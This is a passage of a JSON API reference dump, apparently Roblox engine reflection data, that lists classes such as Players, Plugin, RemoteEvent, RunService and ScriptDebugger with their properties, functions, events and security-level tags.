ags":[],"Class":"Players","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetPlayers","tags":[],"Class":"Players","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"GetUseCoreScriptHealthBar","tags":["RobloxScriptSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"string","Name":"reason","Default":null},{"Type":"string","Name":"optionalMessage","Default":null}],"Name":"ReportAbuse","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetAbuseReportUrl","tags":["RobloxSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetBuildUserPermissionsUrl","tags":["RobloxSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetChatFilterUrl","tags":["RobloxSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"ChatStyle","Name":"style","Default":"Classic"}],"Name":"SetChatStyle","tags":["PluginSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetLoadDataUrl","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetSaveDataUrl","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetSaveLeaderboardDataUrl","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetSysStatsUrl","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"urlId","Default":null}],"Name":"SetSysStatsUrlId","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":null}],"Name":"TeamChat","tags":["PluginSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":null},{"Type":"Instance","Name":"player","Default":null}],"Name":"WhisperChat","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"character","Default":null}],"Name":"getPlayerFromCharacter","tags":["deprecated"],"Class":"Players","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"getPlayers","tags":["deprecated"],"Class":"Players","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"character","Default":null}],"Name":"playerFromCharacter","tags":["deprecated"],"Class":"Players","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"players","tags":["deprecated"],"Class":"Players","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"blockerUserId","Default":null},{"Type":"int","Name":"blockeeUserId","Default":null}],"Name":"BlockUser","tags":["RobloxScriptSecurity"],"Class":"Players","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetCharacterAppearanceAsync","tags":[],"Class":"Players","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetFriendsAsync","tags":[],"Class":"Players","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetNameFromUserIdAsync","tags":[],"Class":"Players","type":"YieldFunction"},{"ReturnType":"int","Arguments":[{"Type":"string","Name":"userName","Default":null}],"Name":"GetUserIdFromNameAsync","tags":[],"Class":"Players","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"exblockerUserId","Default":null},{"Type":"int","Name":"exblockeeUserId","Default":null}],"Name":"UnblockUser","tags":["RobloxScriptSecurity"],"Class":"Players","type":"YieldFunction"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"player","Type":"Instance"},{"Name":"friendRequestEvent","Type":"FriendRequestEvent"}],"Name":"FriendRequestEvent","tags":["RobloxScriptSecurity"],"Class":"Players","type":"Event"},{"Arguments":[{"Name":"message","Type":"string"}],"Name":"GameAnnounce","tags":["RobloxScriptSecurity"],"Class":"Players","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"}],"Name":"PlayerAdded","tags":[],"Class":"Players","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"}],"Name":"PlayerAddedEarly","tags":["LocalUserSecurity"],"Class":"Players","type":"Event"},{"Arguments":[{"Name":"chatType","Type":"PlayerChatType"},{"Name":"player","Type":"Instance"},{"Name":"message","Type":"string"},{"Name":"targetPlayer","Type":"Instance"}],"Name":"PlayerChatted","tags":["LocalUserSecurity"],"Class":"Players","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"}],"Name":"PlayerRemoving","tags":[],"Class":"Players","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"}],"Name":"PlayerRemovingLate","tags":["LocalUserSecurity"],"Class":"Players","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Plugin","tags":[]},{"ValueType":"bool","type":"Property","Name":"CollisionEnabled","tags":["readonly"],"Class":"Plugin"},{"ValueType":"float","type":"Property","Name":"GridSize","tags":["readonly"],"Class":"Plugin"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"exclusiveMouse","Default":null}],"Name":"Activate","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"name","Default":null}],"Name":"CreateToolbar","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"JointCreationMode","Arguments":[],"Name":"GetJoinMode","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetMouse","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"Variant","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"GetSetting","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"int","Arguments":[],"Name":"GetStudioUserId","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"Objects","Arguments":[{"Type":"Objects","Name":"objects","Default":null}],"Name":"Negate","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"script","Default":null},{"Type":"int","Name":"lineNumber","Default":"0"}],"Name":"OpenScript","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"OpenWikiPage","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"SaveSelectedToRoblox","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"Objects","Arguments":[{"Type":"Objects","Name":"objects","Default":null}],"Name":"Separate","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"Variant","Name":"value","Default":null}],"Name":"SetSetting","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Objects","Name":"objects","Default":null}],"Name":"Union","tags":["PluginSecurity"],"Class":"Plugin","type":"Function"},{"ReturnType":"int","Arguments":[{"Type":"string","Name":"assetType","Default":null}],"Name":"PromptForExistingAssetId","tags":["PluginSecurity"],"Class":"Plugin","type":"YieldFunction"},{"Arguments":[],"Name":"Deactivation","tags":["PluginSecurity"],"Class":"Plugin","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"PluginManager","tags":[]},{"ReturnType":"Instance","Arguments":[],"Name":"CreatePlugin","tags":["PluginSecurity"],"Class":"PluginManager","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"filePath","Default":""}],"Name":"ExportPlace","tags":["PluginSecurity"],"Class":"PluginManager","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"filePath","Default":""}],"Name":"ExportSelection","tags":["PluginSecurity"],"Class":"PluginManager","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"PointsService","tags":["notCreatable"]},{"ReturnType":"int","Arguments":[],"Name":"GetAwardablePoints","tags":["deprecated"],"Class":"PointsService","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"int","Name":"amount","Default":null}],"Name":"AwardPoints","tags":[],"Class":"PointsService","type":"YieldFunction"},{"ReturnType":"int","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetGamePointBalance","tags":[],"Class":"PointsService","type":"YieldFunction"},{"ReturnType":"int","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetPointBalance","tags":["deprecated"],"Class":"PointsService","type":"YieldFunction"},{"Arguments":[{"Name":"userId","Type":"int"},{"Name":"pointsAwarded","Type":"int"},{"Name":"userBalanceInGame","Type":"int"},{"Name":"userTotalBalance","Type":"int"}],"Name":"PointsAwarded","tags":[],"Class":"PointsService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Pose","tags":[]},{"ValueType":"CoordinateFrame","type":"Property","Name":"CFrame","tags":[],"Class":"Pose"},{"ValueType":"PoseEasingDirection","type":"Property","Name":"EasingDirection","tags":[],"Class":"Pose"},{"ValueType":"PoseEasingStyle","type":"Property","Name":"EasingStyle","tags":[],"Class":"Pose"},{"ValueType":"float","type":"Property","Name":"MaskWeight","tags":[],"Class":"Pose"},{"ValueType":"float","type":"Property","Name":"Weight","tags":[],"Class":"Pose"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"pose","Default":null}],"Name":"AddSubPose","tags":[],"Class":"Pose","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetSubPoses","tags":[],"Class":"Pose","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"pose","Default":null}],"Name":"RemoveSubPose","tags":[],"Class":"Pose","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"PostEffect","tags":[]},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"PostEffect"},{"Superclass":"PostEffect","type":"Class","Name":"BloomEffect","tags":[]},{"ValueType":"float","type":"Property","Name":"Intensity","tags":[],"Class":"BloomEffect"},{"ValueType":"float","type":"Property","Name":"Size","tags":[],"Class":"BloomEffect"},{"ValueType":"float","type":"Property","Name":"Threshold","tags":[],"Class":"BloomEffect"},{"Superclass":"PostEffect","type":"Class","Name":"BlurEffect","tags":[]},{"ValueType":"float","type":"Property","Name":"Size","tags":[],"Class":"BlurEffect"},{"Superclass":"PostEffect","type":"Class","Name":"ColorCorrectionEffect","tags":[]},{"ValueType":"float","type":"Property","Name":"Brightness","tags":[],"Class":"ColorCorrectionEffect"},{"ValueType":"float","type":"Property","Name":"Contrast","tags":[],"Class":"ColorCorrectionEffect"},{"ValueType":"float","type":"Property","Name":"Saturation","tags":[],"Class":"ColorCorrectionEffect"},{"ValueType":"Color3","type":"Property","Name":"TintColor","tags":[],"Class":"ColorCorrectionEffect"},{"Superclass":"PostEffect","type":"Class","Name":"SunRaysEffect","tags":[]},{"ValueType":"float","type":"Property","Name":"Intensity","tags":[],"Class":"SunRaysEffect"},{"ValueType":"float","type":"Property","Name":"Spread","tags":[],"Class":"SunRaysEffect"},{"Superclass":"Instance","type":"Class","Name":"RayValue","tags":[]},{"ValueType":"Ray","type":"Property","Name":"Value","tags":[],"Class":"RayValue"},{"Arguments":[{"Name":"value","Type":"Ray"}],"Name":"Changed","tags":[],"Class":"RayValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"Ray"}],"Name":"changed","tags":["deprecated"],"Class":"RayValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadata","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataCallbacks","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataClasses","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataEnums","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataEvents","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataFunctions","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataItem","tags":[]},{"ValueType":"bool","type":"Property","Name":"Browsable","tags":[],"Class":"ReflectionMetadataItem"},{"ValueType":"bool","type":"Property","Name":"Deprecated","tags":[],"Class":"ReflectionMetadataItem"},{"ValueType":"bool","type":"Property","Name":"IsBackend","tags":[],"Class":"ReflectionMetadataItem"},{"ValueType":"double","type":"Property","Name":"UIMaximum","tags":[],"Class":"ReflectionMetadataItem"},{"ValueType":"double","type":"Property","Name":"UIMinimum","tags":[],"Class":"ReflectionMetadataItem"},{"ValueType":"string","type":"Property","Name":"summary","tags":[],"Class":"ReflectionMetadataItem"},{"Superclass":"ReflectionMetadataItem","type":"Class","Name":"ReflectionMetadataClass","tags":[]},{"ValueType":"int","type":"Property","Name":"ExplorerImageIndex","tags":[],"Class":"ReflectionMetadataClass"},{"ValueType":"int","type":"Property","Name":"ExplorerOrder","tags":[],"Class":"ReflectionMetadataClass"},{"ValueType":"bool","type":"Property","Name":"Insertable","tags":[],"Class":"ReflectionMetadataClass"},{"ValueType":"string","type":"Property","Name":"PreferredParent","tags":[],"Class":"ReflectionMetadataClass"},{"Superclass":"ReflectionMetadataItem","type":"Class","Name":"ReflectionMetadataEnum","tags":[]},{"Superclass":"ReflectionMetadataItem","type":"Class","Name":"ReflectionMetadataEnumItem","tags":[]},{"Superclass":"ReflectionMetadataItem","type":"Class","Name":"ReflectionMetadataMember","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataProperties","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ReflectionMetadataYieldFunctions","tags":[]},{"Superclass":"Instance","type":"Class","Name":"RemoteEvent","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"Tuple","Name":"arguments","Default":null}],"Name":"FireAllClients","tags":[],"Class":"RemoteEvent","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"Tuple","Name":"arguments","Default":null}],"Name":"FireClient","tags":[],"Class":"RemoteEvent","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Tuple","Name":"arguments","Default":null}],"Name":"FireServer","tags":[],"Class":"RemoteEvent","type":"Function"},{"Arguments":[{"Name":"arguments","Type":"Tuple"}],"Name":"OnClientEvent","tags":[],"Class":"RemoteEvent","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"arguments","Type":"Tuple"}],"Name":"OnServerEvent","tags":[],"Class":"RemoteEvent","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"RemoteFunction","tags":[]},{"ReturnType":"Tuple","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"Tuple","Name":"arguments","Default":null}],"Name":"InvokeClient","tags":[],"Class":"RemoteFunction","type":"YieldFunction"},{"ReturnType":"Tuple","Arguments":[{"Type":"Tuple","Name":"arguments","Default":null}],"Name":"InvokeServer","tags":[],"Class":"RemoteFunction","type":"YieldFunction"},{"ReturnType":"Tuple","Arguments":[{"Name":"arguments","Type":"Tuple"}],"Name":"OnClientInvoke","tags":[],"Class":"RemoteFunction","type":"Callback"},{"ReturnType":"Tuple","Arguments":[{"Name":"player","Type":"Instance"},{"Name":"arguments","Type":"Tuple"}],"Name":"OnServerInvoke","tags":[],"Class":"RemoteFunction","type":"Callback"},{"Superclass":"Instance","type":"Class","Name":"RenderHooksService","tags":[]},{"ReturnType":"void","Arguments":[],"Name":"CaptureMetrics","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"qId","Default":null}],"Name":"DisableQueue","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"enabled","Default":null}],"Name":"EnableAdorns","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"qId","Default":null}],"Name":"EnableQueue","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetDeltaAve","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetGPUDelay","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetPresentTime","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetRenderAve","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetRenderConfMax","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetRenderConfMin","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetRenderStd","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"PrintScene","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ReloadShaders","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"width","Default":null},{"Type":"int","Name":"height","Default":null}],"Name":"ResizeWindow","tags":["LocalUserSecurity"],"Class":"RenderHooksService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"RenderSettings","tags":["notbrowsable"]},{"ValueType":"AASamples","type":"Property","Name":"AASamples","tags":[],"Class":"RenderSettings"},{"ValueType":"Antialiasing","type":"Property","Name":"Antialiasing","tags":[],"Class":"RenderSettings"},{"ValueType":"int","type":"Property","Name":"AutoFRMLevel","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"DebugDisableInterpolation","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"EagerBulkExecution","tags":[],"Class":"RenderSettings"},{"ValueType":"QualityLevel","type":"Property","Name":"EditQualityLevel","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"EnableFRM","tags":["hidden"],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"ExportMergeByMaterial","tags":[],"Class":"RenderSettings"},{"ValueType":"FramerateManagerMode","type":"Property","Name":"FrameRateManager","tags":[],"Class":"RenderSettings"},{"ValueType":"GraphicsMode","type":"Property","Name":"GraphicsMode","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"IsAggregationShown","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"IsSynchronizedWithPhysics","tags":[],"Class":"RenderSettings"},{"ValueType":"int","type":"Property","Name":"MeshCacheSize","tags":[],"Class":"RenderSettings"},{"ValueType":"QualityLevel","type":"Property","Name":"QualityLevel","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"ReloadAssets","tags":[],"Class":"RenderSettings"},{"ValueType":"Resolution","type":"Property","Name":"Resolution","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"ShowBoundingBoxes","tags":[],"Class":"RenderSettings"},{"ValueType":"bool","type":"Property","Name":"ShowInterpolationpath","tags":[],"Class":"RenderSettings"},{"ValueType":"int","type":"Property","Name":"TextureCacheSize","tags":[],"Class":"RenderSettings"},{"ReturnType":"int","Arguments":[],"Name":"GetMaxQualityLevel","tags":[],"Class":"RenderSettings","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"ReplicatedFirst","tags":["notCreatable"]},{"ReturnType":"bool","Arguments":[],"Name":"IsDefaultLoadingGuiRemoved","tags":["RobloxScriptSecurity"],"Class":"ReplicatedFirst","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsFinishedReplicating","tags":["RobloxScriptSecurity"],"Class":"ReplicatedFirst","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"RemoveDefaultLoadingScreen","tags":[],"Class":"ReplicatedFirst","type":"Function"},{"Arguments":[],"Name":"FinishedReplicating","tags":["RobloxScriptSecurity"],"Class":"ReplicatedFirst","type":"Event"},{"Arguments":[],"Name":"RemoveDefaultLoadingGuiSignal","tags":["RobloxScriptSecurity"],"Class":"ReplicatedFirst","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ReplicatedStorage","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"RobloxReplicatedStorage","tags":["notCreatable","notbrowsable"]},{"Superclass":"Instance","type":"Class","Name":"RunService","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"int","Name":"priority","Default":null},{"Type":"Function","Name":"function","Default":null}],"Name":"BindToRenderStep","tags":[],"Class":"RunService","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsClient","tags":[],"Class":"RunService","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsRunMode","tags":[],"Class":"RunService","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsRunning","tags":["RobloxScriptSecurity"],"Class":"RunService","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsServer","tags":[],"Class":"RunService","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsStudio","tags":[],"Class":"RunService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Pause","tags":["PluginSecurity"],"Class":"RunService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Reset","tags":["PluginSecurity","deprecated"],"Class":"RunService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Run","tags":["PluginSecurity"],"Class":"RunService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Stop","tags":["PluginSecurity"],"Class":"RunService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"name","Default":null}],"Name":"UnbindFromRenderStep","tags":[],"Class":"RunService","type":"Function"},{"Arguments":[{"Name":"step","Type":"double"}],"Name":"Heartbeat","tags":[],"Class":"RunService","type":"Event"},{"Arguments":[{"Name":"step","Type":"double"}],"Name":"RenderStepped","tags":[],"Class":"RunService","type":"Event"},{"Arguments":[{"Name":"time","Type":"double"},{"Name":"step","Type":"double"}],"Name":"Stepped","tags":[],"Class":"RunService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"RuntimeScriptService","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"ScriptContext","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"ScriptsDisabled","tags":["LocalUserSecurity"],"Class":"ScriptContext"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"assetId","Default":null},{"Type":"Instance","Name":"parent","Default":null},{"Type":"string","Name":"name","Default":null}],"Name":"AddCoreScript","tags":["RobloxScriptSecurity"],"Class":"ScriptContext","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"Instance","Name":"parent","Default":null}],"Name":"AddCoreScriptLocal","tags":["RobloxScriptSecurity"],"Class":"ScriptContext","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"assetId","Default":null}],"Name":"AddStarterScript","tags":["LocalUserSecurity"],"Class":"ScriptContext","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"bool","Name":"clearHighwaterMark","Default":"true"}],"Name":"GetHeapStats","tags":["RobloxScriptSecurity"],"Class":"ScriptContext","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetScriptStats","tags":["RobloxScriptSecurity"],"Class":"ScriptContext","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"enable","Default":"false"}],"Name":"SetCollectScriptStats","tags":["RobloxScriptSecurity"],"Class":"ScriptContext","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"double","Name":"seconds","Default":null}],"Name":"SetTimeout","tags":["PluginSecurity"],"Class":"ScriptContext","type":"Function"},{"Arguments":[{"Name":"object","Type":"Instance"},{"Name":"member","Type":"string"},{"Name":"script","Type":"Instance"}],"Name":"CamelCaseViolation","tags":["RobloxScriptSecurity"],"Class":"ScriptContext","type":"Event"},{"Arguments":[{"Name":"message","Type":"string"},{"Name":"stackTrace","Type":"string"},{"Name":"script","Type":"Instance"}],"Name":"Error","tags":[],"Class":"ScriptContext","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ScriptDebugger","tags":["notCreatable"]},{"ValueType":"int","type":"Property","Name":"CurrentLine","tags":["readonly"],"Class":"ScriptDebugger"},{"ValueType":"bool","type":"Property","Name":"IsDebugging","tags":["readonly"],"Class":"ScriptDebugger"},{"ValueType":"bool","type":"Property","Name":"IsPaused","tags":["readonly"],"Class":"ScriptDebugger"},{"ValueType":"Object","type":"Property","Name":"Script","tags":["readonly"],"Class":"ScriptDebugger"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"expression","Default":null}],"Name":"AddWatch","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetBreakpoints","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Map","Arguments":[],"Name":"GetGlobals","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Map","Arguments":[{"Type":"int","Name":"stackFrame","Default":"0"}],"Name":"GetLocals","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetStack","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Map","Arguments":[{"Type":"int","Name":"stackFrame","Default":"0"}],"Name":"GetUpvalues","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Variant","Arguments":[{"Type":"Instance","Name":"watch","Default":null}],"Name":"GetWatchValue","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetWatches","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Resume","tags":["deprecated"],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"line","Default":null}],"Name":"SetBreakpoint","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"Variant","Name":"value","Default":null}],"Name":"SetGlobal","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"Variant","Name":"value","Default":null},{"Type":"int","Name":"stackFrame","Default":"0"}],"Name":"SetLocal","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"Variant","Name":"value","Default":null},{"Type":"int","Name":"stackFrame","Default":"0"}],"Name":"SetUpvalue","tags":[],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"StepIn","tags":["deprecated"],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"StepOut","tags":["deprecated"],"Class":"ScriptDebugger","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"StepOver","tags":["deprecated"],"Class":"ScriptDebugger","type":"Function"},{"Arguments":[{"Name":"breakpoint","Type":"Instance"}],"Name":"BreakpointAdded","tags":[],"Class":"ScriptDebugger","type":"Event"},{"Arguments":[{"Name":"breakpoint","Type":"Instance"}],"Name":"BreakpointRemoved","tags":[],"Class":"ScriptDebugger","type":"Event"},{"Arguments":[{"Name":"line","Type":"int"}],"Name":"EncounteredBreak","tags":[],"Class":"ScriptDebugger","type":"Event"},{"Arguments":[],"Name":"Resuming","tags":[],"Class":"ScriptDebugger","type":"Event"},{"Arguments":[{"Name":"watch","Type":"Instance"}],"Name":"WatchAdded","tags":[],"Class":"ScriptDebugger","type":"Event"},{"Arguments":[{"Name":"watch","Type":"Instance"}],"Name":"WatchRemoved","tags":[],"Class":"ScriptDebugger","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ScriptInformationProvider","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"access","Default":null}],"Name":"SetAccessKey","tags":["RobloxSecurity"],"Class":"ScriptInformationProvider","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetAssetUrl","tags":["LocalUserSecurity"],"Class":"ScriptInformationProvider","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"ScriptService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Selection","tags":[]},{"ReturnType":"Objects","Arguments":[],"Name":"Get","tags":["PluginSecurity"],"Class":"Selection","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Objects","Name":"selection","Default":null}],"Name":"Set","tags":["PluginSecurity"],"Class":"Selection","type":"Function"},{"Arguments":[],"Name":"SelectionChanged","tags":[],"Class":"Selection","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ServerScriptService","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"ServerStorage","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"ServiceProvider","tags":["notbrowsable"]},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"className","Default":null}],"Name":"FindService","tags":[],"Class":"ServiceProvider","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"className","Default":null}],"Name":"GetService","tags":[],"Class":"ServiceProvider","type":"Function"},{"ReturnType":"In